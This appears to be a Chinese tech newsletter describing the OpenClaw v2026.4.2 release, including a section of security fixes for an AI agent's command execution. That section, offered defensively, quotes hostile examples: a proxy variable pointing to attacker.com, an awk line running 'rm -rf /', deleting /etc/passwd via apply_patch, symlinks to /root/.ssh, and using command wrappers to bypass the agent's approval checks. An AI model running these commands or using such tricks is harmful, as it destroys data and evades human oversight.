夜雨聆风OpenClaw 每周速递 | v2026.4.2:200+ 安全修复,史上最大规模安全更新
📅 2026 年第 14 周 | 4 月 4 日
✍️ 作者:帕吉
📰 本周概要
OpenClaw 迎来 v2026.4.2,这是史上最大规模安全更新 🔒
✨ 核心亮点:
- • 🔒 200+ 安全修复(执行、网关、文件系统、认证全方位加固)
- • 🔄 配置系统大重构(插件独立配置)
- • 📋 任务流管理(Task Flow 控制面板)
- • 📱 QQ Bot 新通道支持
- • 🔌 MCP 远程服务器支持
此外还有 Matrix、LINE、Slack、Discord、Telegram 等多平台优化 📱
🔥 重大更新
⭐ 1. 配置系统重构 🔄
这是最大的 Breaking Change,影响所有用户。
OpenClaw 把插件相关配置从核心配置中剥离出来,每个插件管理自己的配置 🏠
📋 迁移内容:
| 配置项 | 旧路径 | 新路径 |
|---|---|---|
| 🔍 xAI 搜索 | tools.web.x_search.* | plugins.entries.xai.config.xSearch.* |
| 🌐 Firecrawl 抓取 | tools.web.fetch.firecrawl.* | plugins.entries.firecrawl.config.webFetch.* |
🛠️ 自动迁移命令:
openclaw doctor --fix这个命令会自动把旧配置迁移到新路径,不用手动改 ✅
❓ 为什么重要:
以前插件配置和核心配置混在一起,改一个插件的配置可能影响其他功能 🤯 现在每个插件独立管理,更清晰、更安全、更容易维护 🔧
⭐ 2. 任务流管理(Task Flow)📋
新增 openclaw flows 命令,管理后台任务的生命周期 🎯
🛠️ 新命令:
# 查看所有任务流
openclaw flows list
# 查看任务流详情
openclaw flows show <flow-id>
# 取消任务流
openclaw flows cancel <flow-id>📦 背景任务统一管理:
以前 ACP(AI Coding Protocol)、子代理(Subagent)、定时任务(Cron)各自管理自己的后台任务,状态分散、难以追踪 🤯
现在统一到 SQLite 后台任务注册表,可以:
- • 🔍 查看所有后台任务的运行状态
- • 🔄 恢复中断的任务
- • 🧹 清理孤儿任务
- • 📊 审计任务执行历史
❓ 为什么重要:
后台任务是 OpenClaw 的核心能力之一 🚀 比如:
- • 🤖 AI 编程助手 在后台写代码,完成后通知你
- • ⏰ 定时任务 每天早上推送新闻摘要
- • 🔄 子代理 并行处理多个任务
有了任务流管理,这些任务的状态一目了然,出问题也能快速定位 ✅
⭐ 3. QQ Bot 通道支持 📱
OpenClaw 新增 QQ Bot 作为官方支持的通道 🎮
🎁 支持能力:
- • ✅ 多账号设置
- • ✅ Slash 命令
- • ✅ 媒体发送/接收(图片、文件)
- • ✅ 提醒功能
- • ✅ SecretRef 凭据管理
❓ 为什么重要:
QQ 是中国最流行的即时通讯软件之一 🇨🇳 很多年轻用户、游戏社区、二次元圈子主要活跃在 QQ 🎮
现在可以在 QQ 里接入 OpenClaw AI 助手,服务这些用户群体 ✅
⭐ 4. MCP 远程服务器支持 🔌
MCP(Model Context Protocol)现在支持远程 HTTP/SSE 服务器 🌐
🛠️ 配置示例:
{
"mcp": {
"servers": {
"my-remote-server": {
"url": "https://api.example.com/mcp",
"headers": {
"Authorization": "Bearer YOUR_API_KEY"
}
}
}
}
}❓ 为什么重要:
MCP 是让 AI 连接外部工具的标准协议 🔌 以前只支持本地进程(stdio),现在支持远程服务器,意味着:
- • 🌍 云端工具 可以直接接入,不用部署到本地
- • 🔐 敏感 API 可以放在安全的服务器上
- • 🤝 团队共享 同一个 MCP 服务器,多人复用
5. 通道能力大升级 📱
除了新增 QQ Bot,现有通道也迎来重大更新:
💬 Matrix(去中心化通讯):
- • ⚡ 消息流式输出(打字效果)
- • 📜 可选房间历史上下文
- • 🔀 HTTP 代理支持
- • 🔒 E2EE 端到端加密优化
📱 LINE(日本主流 IM):
- • 🖼️ 支持发送图片、视频、音频
- • 🧵 ACP 绑定当前对话
💬 Slack:
- • ✅ 原生执行审批(审批按钮直接显示在 Slack 里)
- • 📊 状态反应生命周期(队列、思考、工具、完成、错误)
🎮 Discord:
- • 🔄 网关重连优化(不再崩溃)
- • 🎤 语音输入权限检查
📨 Telegram:
- • 📝 长消息智能分段(不再在单词中间切断)
- • 🖼️ 图片上传优化
🔒 安全加固:200+ 修复,全面防护
这是 OpenClaw 史上最大规模的安全更新 🛡️
这次涉及 200+ 安全修复,覆盖执行、网络、文件系统、认证等多个层面。
⭐ 1. 执行安全:阻止环境变量劫持 🛡️
🎯 问题: AI 执行命令时,恶意用户可能通过环境变量劫持,把流量导向攻击者控制的服务器。
✅ 修复内容:
| 攻击向量 | 风险 | 修复 |
|---|---|---|
HTTP_PROXY / HTTPS_PROXY | 流量被劫持到恶意代理 | ✅ 阻止覆盖 |
TLS_CERT_FILE / NODE_EXTRA_CA_CERTS | TLS 证书被替换,中间人攻击 | ✅ 阻止覆盖 |
DOCKER_HOST | Docker 命令被重定向到恶意守护进程 | ✅ 阻止覆盖 |
PIP_INDEX_URL / NPM_CONFIG_REGISTRY | 包管理器被重定向,安装恶意包 | ✅ 阻止覆盖 |
PYTHONPATH / NODE_PATH | 加载恶意代码模块 | ✅ 阻止覆盖 |
💡 举个例子:
# 攻击者尝试注入恶意代理
export HTTPS_PROXY="https://attacker.com:443"
# OpenClaw 现在会阻止这个环境变量生效
# 即使 AI 执行了 curl 命令,流量也不会被劫持⭐ 2. 命令包装器安全处理 🔧
🎯 问题: macOS 有一些命令包装器(如 arch、xcrun、caffeinate),攻击者可能利用它们绕过审批。
✅ 修复内容:
| 包装器 | 风险 | 修复 |
|---|---|---|
arch -x86_64 ... | 绕过架构检查 | ✅ 解包后审批真实命令 |
xcrun ... | 绕过 Xcode 工具路径 | ✅ 解包后审批真实命令 |
caffeinate ... | 绕过电源管理限制 | ✅ 解包后审批真实命令 |
sandbox-exec ... | 绕过沙箱限制 | ✅ 解包后审批真实命令 |
✅ awk/sed 家族不再走快速审批:
awk、sed、find、xargs 等工具支持内联代码执行,可能被用来绕过审批 🔓
# 攻击者尝试用 awk 执行任意代码
awk 'BEGIN { system("rm -rf /") }'
# OpenClaw 现在会把 awk 当作"解释器"
# 不再允许 "allow-always" 持久信任
# 每次执行都需要重新审批⭐ 3. 网关安全:HTTP 授权加强 🔐
🎯 问题: OpenClaw Gateway 暴露 HTTP API,攻击者可能伪造请求获取更高权限。
✅ 修复内容:
| 漏洞 | 风险 | 修复 |
|---|---|---|
| 自声明 Scope | 攻击者在请求头声明 x-openclaw-scopes: admin | ✅ 忽略自声明,只信任服务端分配 |
| HTTP 工具调用 | 任意 HTTP 调用可能访问内网 | ✅ 默认拒绝,需要显式授权 |
/v1/embeddings | 未授权访问嵌入接口 | ✅ 需要 write scope |
/v1/chat/completions | 外部调用者可能升级权限 | ✅ 绑定为非 owner 权限 |
💡 WebSocket 帧大小限制:
防止恶意客户端发送超大帧导致内存耗尽 🧠
⭐ 4. 文件系统安全:防符号链接攻击 📁
🎯 问题: 符号链接(symlink)可能指向工作区外的敏感文件,导致越权访问。
✅ 修复内容:
| 漏洞 | 风险 | 修复 |
|---|---|---|
| 技能加载器 | 恶意技能包含指向 /etc/passwd 的符号链接 | ✅ 拒绝工作区外的符号链接 |
| 沙箱上传 | 上传目录包含指向 /root/.ssh 的符号链接 | ✅ 拒绝工作区外的符号链接 |
| 媒体路径 | MEDIA:/path/to/file 指向敏感文件 | ✅ 限制在允许的媒体根目录内 |
| ACP 附件 | AI 读取工作区外的文件 | ✅ 通过共享附件缓存,拒绝越权路径 |
💡 应用补丁(apply_patch)安全:
# 攻击者尝试删除工作区外的文件
apply_patch: delete /etc/passwd
# OpenClaw 现在会验证路径
# 只允许在工作区内执行删除操作⭐ 5. 认证安全:令牌和密钥保护 🔑
✅ 修复内容:
| 漏洞 | 风险 | 修复 |
|---|---|---|
| 可信代理混合令牌 | 同时配置共享令牌和设备令牌导致混淆 | ✅ 拒绝混合配置 |
| 设备令牌轮换 | 轮换后旧连接未断开 | ✅ 轮换后立即断开活跃连接 |
| Webhook 签名比较 | 时序攻击泄露签名 | ✅ 使用时间安全比较函数 |
| Nostr 私钥泄露 | 私钥在配置快照中明文显示 | ✅ 配置快照中脱敏 |
⭐ 6. 其他安全修复 🛠️
📱 通道安全:
| 通道 | 修复 |
|---|---|
| Discord | 语音输入权限检查(未授权用户不能触发语音识别) |
| Telegram | 群组语音消息预检转录权限(未授权发送者不能消耗转录配额) |
| Feishu | 群组引用消息不触发机器人(防止伪造 @ 提及) |
| BlueBubbles | 签名验证使用时间安全比较 |
| Microsoft Teams | JSON 解析前验证 Bearer 认证 |
🔐 随机数安全:
Math.random() 替换为加密安全的随机数生成器,用于:
- • 🆔 标识符生成
- • ⏱️ 延迟抖动
- • 🎨 UI UUID
🎯 安全升级总结
| 层面 | 修复数量 | 核心改进 |
|---|---|---|
| 🛡️ 执行安全 | 50+ | 环境变量劫持、命令包装器、awk/sed 审批 |
| 🔐 网关安全 | 30+ | HTTP 授权、WebSocket 限制、可信代理 |
| 📁 文件系统 | 40+ | 符号链接、沙箱上传、媒体路径 |
| 🔑 认证安全 | 20+ | 令牌轮换、Webhook 签名、私钥脱敏 |
| 📱 通道安全 | 30+ | Discord/Telegram/Feishu 权限检查 |
| 🧩 其他 | 30+ | 随机数、DOM 安全、MCP 验证 |
💪 能力越强,越要有边界。 这次大规模安全更新,让 OpenClaw 在企业环境部署时更加放心 🏢
📱 小改进
| 模块 | 改进 |
|---|---|
| 🤖 ACP | 插件工具 MCP 桥接(默认关闭)、Codex 通道绑定 |
| 🧠 记忆 | QMD 会话搜索、FTS 中文/日文/韩文支持 |
| 🐳 Docker | BuildKit 强制启用(解决 --mount 问题) |
| 📱 Android | Google Assistant 入口、通知转发控制 |
| 🍎 macOS | Voice Wake 触发 Talk Mode |
| 🔊 TTS | 结构化诊断和回退分析 |
| 🌐 Web 搜索 | SearXNG 提供商插件 |
📌 总结
这期周报的核心是架构升级 🚀
- • 🔄 配置系统重构,插件更独立
- • 📋 任务流管理,后台任务一目了然
- • 📱 QQ Bot 新通道,覆盖更多用户
- • 🔌 MCP 远程服务器,云端工具直接接入
- • 🔒 200+ 安全修复,更可靠更安全
🔗 版本详情:
- • GitHub Release v2026.4.2
- • GitHub Release v2026.4.1
- • GitHub Release v2026.3.31
- • GitHub Release v2026.3.28
如果你对 OpenClaw 感兴趣,欢迎去 GitHub 看看,或者关注公众号「码神说」获取后续更新 👋
这是 OpenClaw 每周速递的第 2 期 📰
GitHub: github.com/openclaw/openclaw
